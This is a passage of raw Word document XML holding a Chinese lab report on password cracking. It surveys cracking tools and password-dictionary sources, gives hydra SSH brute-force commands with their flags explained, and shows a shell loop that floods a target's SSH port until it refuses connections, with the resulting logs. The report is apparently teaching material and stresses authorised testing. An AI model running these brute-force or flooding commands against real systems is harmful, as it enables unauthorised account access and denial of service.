    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1" w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-4" w:leftChars="-2" w:right="-512" w:rightChars="-244"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>实验目的和要求</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密码破解是指通过技术手段，尝试破解密码以获取未授权的访问权限或者信息。密码破解实践的主要目的是测试系统或应用程序的安全性，以发现存在的弱点并加以修复，从而提高系统或应用程序的安全性。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密码破解是指尝试通过暴力猜测或利用其他方式获取未授权访问系统、应用程序或数据的密码。密码破解的实践目的和要求如下：</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目的：</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确定系统、应用程序或数据是否存在密码破解的漏洞，从而及时修复漏洞，提高系统安全性。</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检查系统管理员、用户等是否使用过于简单的密码，提高密码强度，减少安全风险。</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要求：</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合法性：密码破解的实践必须经过合法授权，未经授权的密码破解属于违法行为。</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安全性：在进行密码破解的实践中，必须采取安全措施，确保不会对系统或数据造成损失或影响。</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遵循道德规范：密码破解的实践应该遵循道德规范，不应该侵犯个人隐私或其他利益。</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知情权：进行密码破解的实践前，必须征得相关方的知情同意，确保不会造成损失或影响。</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记录和报告：进行密码破解的实践需要记录相关信息，包括破解过程、结果等，必要时需要向相关方报告相关信息和结果。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法律合规性：密码破解实践必须遵守法律法规，不得进行非法的破解行为，如未经授权的侵入他人计算机系统。</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授权性：密码破解实践必须事先获得授权，对于未经授权的测试，可能会对系统或应用程序造成不可逆的损害。</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安全性：在进行密码破解实践时，必须采取安全的手段和措施，以保证破解过程不会对系统或应用程序造成影响，并确保测试的数据和结果得到妥善保护。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道德性：密码破解实践必须具备道德性，不能用于违反公共道德或损害他人利益的行为，如利用密码破解获取他人隐私等。</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效果性：密码破解实践必须具备实际效果，能够发现存在的安全漏洞并提出相应的修复建议，以提高系统或应用程序的安全性</w:t>
      </w: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2、实验准备工作</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hydra： 这款密码爆破工具功能非常强大，支持的协议非常之多，比如常见的rdp、ssh、FTP、smb等， 本文主要介绍这种爆破工具的使用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Brutus：称最快最灵活对的密码破解工具，最早发布于2000年的Brutus是目前最流行的远程在线密码破解工具，目前该工具免费，但只有windows版本</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RainbowCrack： RainbowCrack是一个哈希破解工具，无需自己生成彩虹表。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Wfuzz：Wfuzz是一个web应用密码暴力破解工具。</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Cain and Abel ： Cain and Abel是注明的多任务密码破解工具。值得注意的是该工具仅能运行于Windows平台，可以作为网络嗅探器使用，用字典攻击破解加密密码，记录VoIP对话，暴力攻击、密码分析攻击，恢复缓存密码和乱序密码等。</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eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>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OphCrack： 是Windows平台上一个免费的基于彩虹表的密码破解工具，也是最流行的windows密码破解工具，也可以应用于Linux和Mac系统，能够破解LM和NTLM哈希表。</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2" w:right="-512" w:rightChars="-244"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>实验内容及步骤</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80" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>如何收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://so.csdn.net/so/search?q=%E5%AF%86%E7%A0%81%E5%AD%97%E5%85%B8&amp;spm=1001.2101.3001.7020" \t "/Users/wanglu/Documents\\x/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>密码字典</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w: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1. 主要获取方式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学习过程中， 主要获取密码字典的方式如下</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对于密码字典， 推荐在github上寻找， 直接百度谷歌的， 要么比较凌乱，要么字典需要收费。</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Kali 系统自带字典目录wordlists，路径为 /usr/share/wordlists/ ， 可以了解并使用。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自制密码字典</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2. 好的密码字典项目分享</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在github上找到几个信息比较丰富的密码字典如下， 仅供参考</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资源:</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一、 https://github.com/huyuanzhi2/password_brute_dictionary</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i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4675505" cy="1082040"/>
            <wp:effectExtent l="0" t="0" r="23495" b="10160"/>
            <wp:docPr id="67"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId110"/>
                    <a:srcRect r="-684" b="10079"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4675505" cy="108204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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">小结: </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color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. 这个项目中提供的密码字典的量级不多， 但是提供了一个自制密码的思路以及可以直接使用的密码列表，可以用作密码爆破的小试牛刀。 </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color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. 包含项目作者自制字典的代码</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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>二. https://github.com/rootphantomer/Blasting_dictionary</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color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5106670" cy="4652010"/>
            <wp:effectExtent l="0" t="0" r="24130" b="21590"/>
            <wp:docPr id="68"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111"/>
                    <a:srcRect r="-149" b="5165"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5106670" cy="46520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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三 . https://github.com/TheKingOfDuck/fuzzDicts</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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6299835" cy="6362700"/>
            <wp:effectExtent l="0" t="0" r="24765" b="12700"/>
            <wp:docPr id="69"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5" descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112"/>
                    <a:srcRect r="1362" b="5320"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6299835" cy="6362700"/>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80" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>如何自制密码字典：</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bookmarkStart w:id="2" w:name="t8"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1. 使用密码生成工具</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Weakpass是一款基于规则的在线字典生成器 ，可以帮助广大研究人员根据输入的单词集来创建自定义字典</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项目地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern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https://github.com/zzzteph/weakpass</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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3948430" cy="6029325"/>
            <wp:effectExtent l="0" t="0" r="13970" b="15875"/>
            <wp:docPr id="70"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6" descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId113"/>
                    <a:srcRect r="350" b="3509"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3948430" cy="60293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宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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介绍： 介绍： 这个密码生成的平台， 可以根据已知的关键字定向的生成一些密码， 符合用户设置密码的习惯。 这种策略生成的密码，命中的概率可能会高一些。</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crunch–字典生成工具： Crunch是一种创建密码字典工具，按照指定的规则生成密码字典，可以灵活的制定自己的字典文件</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破解密码时，有很多种破解密码的方法，比如：字典，彩虹表，蛮力等。如果我们知道设置密码的策略，那么使用Crunch生成特定的字典，那么Crunch将会是最有力的密码攻击工具。</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github地址:</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https://github.com/crunchsec/crunch https://github.com/jaalto/external-sf--crunch-wordlist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主要参考文章。</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https://www.cnblogs.com/wpjamer/p/9913380.html</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网络上介绍的资源也比较多， 自己暂时还没有仔细实践过， 后续有需求会生成密码列表尝试一下。</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2. 自制密码生成脚本:</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网络上也能搜索到一些使用python脚本自制密码的思路和工具， 其中有一个比较好，印象深刻， 分享一下:</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https://zhuanlan.zhihu.com/p/61354645</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> hydra 操作命令学习</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这里主要介绍一下ssh的爆破操作， 其他协议的爆破可在网络上查找。</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爆破命令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hydra 1.1.1.1 ssh -l user -P /root/Work/sshpasswd.list -t 6 -V -f</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hydra -l root -P top6000.txt -t 10 -vV -e ns 1.1.1.1 ssh</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命令详细:</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攻击目标：1.1.1.1</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使用的模块：ssh</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爆破用户名：user (-l)</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使用的密码字典：/root/Work/sshpasswd.list (-P)</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爆破线程数：6 (-t)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显示详细信息 (-V)</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爆破成功一个后停止 (-f)</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空密码探测和指定用户密码探测(-e ns)</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六、记录一次爆破实践 + ssh尝试拒绝服务攻击</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不知有没有人遇到和我一样的情况，自己设定一个靶机， 爆破22端口ssh, 即使把正确密码放到字典列表中， 也会有可能爆破失败， 也只是概率性的成功（正确密码在列表第一个位置除外）。个人猜测， 这可能是ssh的配置起了作用， 在密码爆破时候，会限制用户登录。</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思考： 基于上面的现象， 是否可以对暴露22端口的ip进行攻击， 大量尝试ssh连接受害机器， 这样是否可以造成拒绝服务访问呢？基于这个思考， 做了一次攻击试验，攻击代码如下:</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while true;do  ssh 1.1.1.1 &amp;  echo 'hello ssh!';done</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1</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其中1.1.1.1 为被攻击机器。</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攻击机打印日志如下(打印速度较快)：</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Pseudo-terminal will not be allocated because stdin is not a terminal.</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Pseudo-terminal will not be allocated because stdin is not a terminal.</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Pseudo-terminal will not be allocated because stdin is not a terminal.</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Pseudo-terminal will not be allocated because stdin is not a terminal.</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kex_exchange_identification: Connection closed by remote host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kex_exchange_identification: Connection closed by remote host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kex_exchange_identification: Connection closed by remote host</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Pseudo-terminal will not be allocated because stdin is not a terminal.</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尝试连接被攻击机, 结果发现连接目标失败， 造成了拒绝服务访问攻击。</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ssh 1.1.1.1</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ssh_exchange_identification: Connection closed by remote host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-4" w:leftChars="-2" w:right="-512" w:rightChars="-244"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>4、实验结果分析</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从试验结果来看， 尝试攻击，确实是可以造成ssh拒绝服务访问的.</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不过杀敌一千自损八百， 攻击机的资源占用也很高</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-4" w:leftChars="-2" w:right="-512" w:rightChars="-244"/>
        <w:rPr>
